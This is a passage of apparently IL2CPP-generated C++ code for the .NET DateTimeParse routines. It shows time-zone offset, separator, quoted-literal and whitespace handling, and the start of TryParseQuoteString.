0, sizeof(L_288)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_288), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); L_287->set_timeZoneOffset_9(L_288); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_289 = ___result4; int32_t* L_290 = L_289->get_address_of_flags_8(); int32_t* L_291 = L_290; int32_t L_292 = *((int32_t*)L_291); *((int32_t*)L_291) = (int32_t)((int32_t)((int32_t)L_292|(int32_t)((int32_t)512))); goto IL_0a8e; } IL_06b5: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_293 = ___str0; bool L_294 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_293, ((int32_t)43), /*hidden argument*/NULL); if (L_294) { goto IL_06cc; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_295 = ___str0; bool L_296 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_295, ((int32_t)45), /*hidden argument*/NULL); if (!L_296) { goto IL_0a8e; } } IL_06cc: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_297 = ___str0; int32_t* L_298 = L_297->get_address_of_Index_1(); int32_t* L_299 = L_298; int32_t L_300 = *((int32_t*)L_299); *((int32_t*)L_299) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_300, (int32_t)1)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_15), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_301 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_302 = DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_301, 3, (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&V_15), /*hidden argument*/NULL); if (L_302) { goto IL_06fb; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_303 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_303, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_06fb: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_304 = ___result4; int32_t L_305 = L_304->get_flags_8(); if (!((int32_t)((int32_t)L_305&(int32_t)((int32_t)256)))) { goto IL_0730; } } { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_306 = V_15; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_307 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_308 = L_307->get_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_309 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC(L_306, L_308, /*hidden argument*/NULL); if (!L_309) { goto IL_0730; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_310 = ___result4; Il2CppChar L_311 = ((Il2CppChar)((int32_t)75)); RuntimeObject * L_312 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_311); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_310, 3, _stringLiteral76821F13DAA340E4E5BA76D3FA54F27CA331CCB5, L_312, /*hidden argument*/NULL); return (bool)0; } IL_0730: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_313 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_314 = V_15; L_313->set_timeZoneOffset_9(L_314); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_315 = ___result4; int32_t* L_316 = L_315->get_address_of_flags_8(); int32_t* L_317 = L_316; int32_t L_318 = *((int32_t*)L_317); *((int32_t*)L_317) = (int32_t)((int32_t)((int32_t)L_318|(int32_t)((int32_t)256))); goto IL_0a8e; } IL_074e: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_319 = ___dtfi3; String_t* L_320 = DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58(L_319, /*hidden argument*/NULL); int32_t L_321 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_320, /*hidden argument*/NULL); if ((((int32_t)L_321) <= ((int32_t)1))) { goto IL_076c; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_322 = ___dtfi3; String_t* L_323 = DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58(L_322, /*hidden argument*/NULL); Il2CppChar L_324 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_323, 0, /*hidden argument*/NULL); if ((((int32_t)L_324) == ((int32_t)((int32_t)58)))) { goto IL_0779; } } IL_076c: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_325 = ___str0; bool L_326 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_325, ((int32_t)58), /*hidden argument*/NULL); if (L_326) { goto IL_0a8e; } } IL_0779: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_327 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_328 = ___dtfi3; String_t* L_329 = DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58(L_328, /*hidden argument*/NULL); bool L_330 = __DTString_Match_m6E1CE300661D15D140D2FAC5C54E74BDBE70EE19((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_327, L_329, /*hidden argument*/NULL); if (L_330) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_331 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_331, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_079a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_332 = ___dtfi3; String_t* L_333 = DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C(L_332, /*hidden argument*/NULL); int32_t L_334 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_333, /*hidden argument*/NULL); if ((((int32_t)L_334) <= ((int32_t)1))) { goto IL_07b8; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_335 = ___dtfi3; String_t* L_336 = DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C(L_335, /*hidden argument*/NULL); Il2CppChar L_337 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_336, 0, /*hidden argument*/NULL); if ((((int32_t)L_337) == ((int32_t)((int32_t)47)))) { goto IL_07c5; } } IL_07b8: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_338 = ___str0; bool L_339 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_338, ((int32_t)47), /*hidden argument*/NULL); if (L_339) { goto IL_0a8e; } } IL_07c5: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_340 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_341 = ___dtfi3; String_t* L_342 = DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C(L_341, /*hidden argument*/NULL); bool L_343 = __DTString_Match_m6E1CE300661D15D140D2FAC5C54E74BDBE70EE19((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_340, L_342, /*hidden argument*/NULL); if (L_343) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_344 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_344, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_07e6: { StringBuilder_t * L_345 = (StringBuilder_t *)il2cpp_codegen_object_new(StringBuilder_t_il2cpp_TypeInfo_var); StringBuilder__ctor_mF928376F82E8C8FF3C11842C562DB8CF28B2735E(L_345, /*hidden argument*/NULL); V_12 = L_345; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_346 = ___format1; String_t* L_347 = L_346->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_348 = ___format1; int32_t L_349 = L_348->get_Index_1(); StringBuilder_t * L_350 = V_12; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_351 = DateTimeParse_TryParseQuoteString_m4330D0C32F5AFEE3E7F1DC53584C2247DCF5CBAC(L_347, L_349, L_350, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_351) { goto IL_081a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_352 = ___result4; Il2CppChar L_353 = V_10; Il2CppChar L_354 = L_353; RuntimeObject * L_355 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_354); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_352, 3, _stringLiteralB12EF91185B3724C930E74AF87B78C777D1C701F, L_355, /*hidden argument*/NULL); return (bool)0; } IL_081a: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_356 = ___format1; int32_t* L_357 = L_356->get_address_of_Index_1(); int32_t* L_358 = L_357; int32_t L_359 = *((int32_t*)L_358); int32_t L_360 = V_0; *((int32_t*)L_358) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_359, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_360, (int32_t)1)))); StringBuilder_t * L_361 = V_12; String_t* L_362 = VirtFuncInvoker0< String_t* >::Invoke(3 /* System.String System.Object::ToString() */, L_361); V_13 = L_362; V_16 = 0; goto IL_0879; } IL_0835: { String_t* L_363 = V_13; int32_t L_364 = V_16; Il2CppChar L_365 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_363, L_364, /*hidden argument*/NULL); if ((!(((uint32_t)L_365) == ((uint32_t)((int32_t)32))))) { goto IL_0852; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_366 = ___parseInfo2; bool L_367 = L_366->get_fAllowInnerWhite_5(); if (!L_367) { goto IL_0852; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_368 = ___str0; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_368, /*hidden argument*/NULL); goto IL_0873; } IL_0852: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_369 = ___str0; String_t* L_370 = V_13; int32_t L_371 = V_16; Il2CppChar L_372 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_370, L_371, /*hidden argument*/NULL); bool L_373 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_369, L_372, /*hidden argument*/NULL); if (L_373) { goto IL_0873; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_374 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_374, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0873: { int32_t L_375 = V_16; V_16 = ((int32_t)il2cpp_codegen_add((int32_t)L_375, (int32_t)1)); } IL_0879: { int32_t L_376 = V_16; String_t* L_377 = V_13; int32_t L_378 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_377, /*hidden argument*/NULL); if ((((int32_t)L_376) < ((int32_t)L_378))) { goto IL_0835; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_379 = ___result4; int32_t L_380 = L_379->get_flags_8(); if (!((int32_t)((int32_t)L_380&(int32_t)((int32_t)2048)))) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_381 = ___result4; int32_t L_382 = L_381->get_flags_8(); if (!((int32_t)((int32_t)L_382&(int32_t)((int32_t)8192)))) { goto IL_08d4; } } { String_t* L_383 = V_13; bool L_384 = String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE(L_383, _stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78, /*hidden argument*/NULL); if (!L_384) { goto IL_08d4; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_385 = ___result4; int32_t* L_386 = L_385->get_address_of_flags_8(); int32_t* L_387 = L_386; int32_t L_388 = *((int32_t*)L_387); *((int32_t*)L_387) = (int32_t)((int32_t)((int32_t)L_388|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_389 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_390 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_389->set_timeZoneOffset_9(L_390); goto IL_0a8e; } IL_08d4: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_391 = ___result4; int32_t L_392 = L_391->get_flags_8(); if (!((int32_t)((int32_t)L_392&(int32_t)((int32_t)16384)))) { goto IL_0a8e; } } { String_t* L_393 = V_13; bool L_394 = String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE(L_393, _stringLiteral909F99A779ADB66A76FC53AB56C7DD1CAF35D0FD, /*hidden argument*/NULL); if (!L_394) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_395 = ___result4; int32_t* L_396 = L_395->get_address_of_flags_8(); int32_t* L_397 = L_396; int32_t L_398 = *((int32_t*)L_397); *((int32_t*)L_397) = (int32_t)((int32_t)((int32_t)L_398|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_399 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_400 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_399->set_timeZoneOffset_9(L_400); goto IL_0a8e; } IL_0918: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_401 = ___format1; int32_t L_402 = L_401->get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_403 = ___format1; String_t* L_404 = L_403->get_Value_0(); int32_t L_405 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_404, /*hidden argument*/NULL); if ((((int32_t)L_402) >= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_405, (int32_t)1))))) { goto IL_0947; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_406 = ___format1; String_t* L_407 = L_406->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_408 = ___format1; int32_t L_409 = L_408->get_Index_1(); Il2CppChar L_410 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_407, ((int32_t)il2cpp_codegen_add((int32_t)L_409, (int32_t)1)), /*hidden argument*/NULL); if ((!(((uint32_t)L_410) == ((uint32_t)((int32_t)37))))) { goto IL_0a8e; } } IL_0947: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_411 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_411, 2, _stringLiteral3647A113CA9819A53C36BF6083C7027C975BE2B5, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0957: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_412 = ___format1; bool L_413 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_412, /*hidden argument*/NULL); if (!L_413) { goto IL_0980; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_414 = ___str0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_415 = ___format1; Il2CppChar L_416 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_415, /*hidden argument*/NULL); bool L_417 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_414, L_416, /*hidden argument*/NULL); if (L_417) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_418 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_418, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0980: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_419 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_419, 2, _stringLiteral3647A113CA9819A53C36BF6083C7027C975BE2B5, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0990: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_420 = ___str0; Il2CppChar L_421 = V_10; bool L_422 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_420, L_421, /*hidden argument*/NULL); if (L_422) { goto IL_0a8e; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_423 = ___format1; bool L_424 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_423, /*hidden argument*/NULL); if (!L_424) { goto IL_09bb; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_425 = ___format1; bool L_426 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_425, ((int32_t)70), /*hidden argument*/NULL); if (!L_426) { goto IL_09bb; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_427 = ___format1; __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_427, /*hidden argument*/NULL); goto IL_0a8e; } IL_09bb: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_428 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_428, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_09cb: { Il2CppChar L_429 = V_10; if ((!(((uint32_t)L_429) == ((uint32_t)((int32_t)32))))) { goto IL_0a18; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_430 = ___parseInfo2; bool L_431 = L_430->get_fAllowInnerWhite_5(); if (L_431) { goto IL_0a8e; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_432 = ___str0; Il2CppChar L_433 = V_10; bool L_434 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_432, L_433, /*hidden argument*/NULL); if (L_434) { goto IL_0a8e; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_435 = ___parseInfo2; bool L_436 = L_435->get_fAllowTrailingWhite_6(); if (!L_436) { goto IL_0a08; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_437 = ___format1; bool L_438 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_437, /*hidden argument*/NULL); if (!L_438) { goto IL_0a08; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_439 = ___str0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_440 = ___format1; ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_441 = ___parseInfo2; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_442 = ___dtfi3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_443 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_444 = DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_439, (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_440, (ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 *)L_441, L_442, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_443, /*hidden argument*/NULL); if (!L_444) { goto IL_0a08; } } { return (bool)1; } IL_0a08: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_445 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_445, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0a18: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_446 = ___format1; bool L_447 = __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_446, _stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78, /*hidden argument*/NULL); if (!L_447) { goto IL_0a74; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_448 = ___format1; int32_t* L_449 = L_448->get_address_of_Index_1(); int32_t* L_450 = L_449; int32_t L_451 = *((int32_t*)L_450); int32_t L_452 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(_stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78, /*hidden argument*/NULL); *((int32_t*)L_450) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_451, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_452, (int32_t)1)))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_453 = ___result4; int32_t* L_454 = L_453->get_address_of_flags_8(); int32_t* L_455 = L_454; int32_t L_456 = *((int32_t*)L_455); *((int32_t*)L_455) = (int32_t)((int32_t)((int32_t)L_456|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_457 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_458 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_457->set_timeZoneOffset_9(L_458); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_459 = ___str0; bool L_460 = __DTString_Match_m6E1CE300661D15D140D2FAC5C54E74BDBE70EE19((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_459, _stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78, /*hidden argument*/NULL); if (L_460) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_461 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_461, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0a74: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_462 = ___str0; Il2CppChar L_463 = V_10; bool L_464 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_462, L_463, /*hidden argument*/NULL); if (L_464) { goto IL_0a8e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_465 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_465, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0a8e: { return (bool)1; } } // System.Boolean System.DateTimeParse::TryParseQuoteString(System.String,System.Int32,System.Text.StringBuilder,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParseQuoteString_m4330D0C32F5AFEE3E7F1DC53584C2247DCF5CBAC (String_t* ___format0, int32_t ___pos1, StringBuilder_t * ___result2, int32_t* ___returnValue3, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; Il2CppChar V_2 = 0x0; bool V_3 = false; Il2CppChar V_4 = 0x0; { int32_t* L_0 = ___returnValue3; *((int32_t*)L_0) = (int32_t)0; String_t* L_1 = ___format0; int32_t L_2 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_1, /*hidden argument*/NULL); V_0 = L_2; int32_t L_3 = ___pos1; V_1 = L_3; String_t* L_4 = ___format0; int32_t L_5 = ___pos1; int32_t L_6 = L_5; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_6, (int32_t)1)); Il2CppChar L_7 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_4, L_6, /*hidden argument*/NULL); V_2 = L_7; V_3 